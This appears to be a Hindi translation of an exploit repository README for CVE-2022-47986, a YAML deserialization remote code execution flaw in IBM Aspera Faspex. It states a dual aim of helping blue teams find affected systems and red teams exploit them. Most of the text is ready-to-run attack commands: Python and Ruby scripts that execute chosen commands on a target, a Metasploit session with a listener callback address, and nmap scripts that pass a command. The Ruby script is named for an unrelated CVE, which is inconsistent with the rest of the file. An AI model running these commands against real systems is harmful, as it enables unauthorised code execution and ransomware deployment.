
CVE-2022-47986: Python, Ruby, NMAP और Metasploit मॉड्यूल जो इस भेद्यता का शोषण करने के लिए हैं।
यह भेद्यता वास्तविक दुनिया में शोषित की जा रही है। IceFire इस भेद्यता का उपयोग लक्षित सिस्टम पर रैनसमवेयर तैनात करने के लिए करता है, मैं SOC/ब्लू टीमों को प्रभावित सिस्टम की पहचान करने और पेंटेस्टर/रेड टीमों को इसका शोषण करने और रिपोर्ट करने में मदद करना चाहता हूँ।
मैं YAML डिसेरिएलाइज़ेशन से IBM Aspera Faspex पर RCE (दूरस्थ कोड निष्पादन) उत्पन्न करने वाली भेद्यता का शोषण करने के लिए शुद्ध पायथन और रूबी स्क्रिप्ट, मेटास्प्लॉइट और nmap मॉड्यूल प्रस्तावित करता हूँ।
python3 CVE-2022-47986.py <target> <command>
# OR
chmod u+x CVE-2022-47986.py
./CVE-2022-47986.py https://aspera.faspax.local id
ruby CVE-2021-31166.rb
ruby CVE-2021-31166.rb <hostname> -c <command>
ruby CVE-2021-31166.rb aspera.faspax.local -c id
msf6 > use exploit/linux/http/ibm_aspera_faspex_rce_yaml_deserialization
msf6 exploit(linux/http/ibm_aspera_faspex_rce_yaml_deserialization) > set RHOST 10.10.10.10
RHOST => 10.10.10.10
msf6 exploit(linux/http/ibm_aspera_faspex_rce_yaml_deserialization) > set LHOST 192.168.77.139
LHOST => 192.168.77.139
msf6 exploit(linux/http/ibm_aspera_faspex_rce_yaml_deserialization) > exploit
nmap -p 443 --script ibm-aspera-faspex-rce 172.17.0.2
nmap -p 443 --script ibm-aspera-faspex-rce --script-args "command=id" 172.17.0.2
GPL, संस्करण 3 के अंतर्गत लाइसेंस प्राप्त।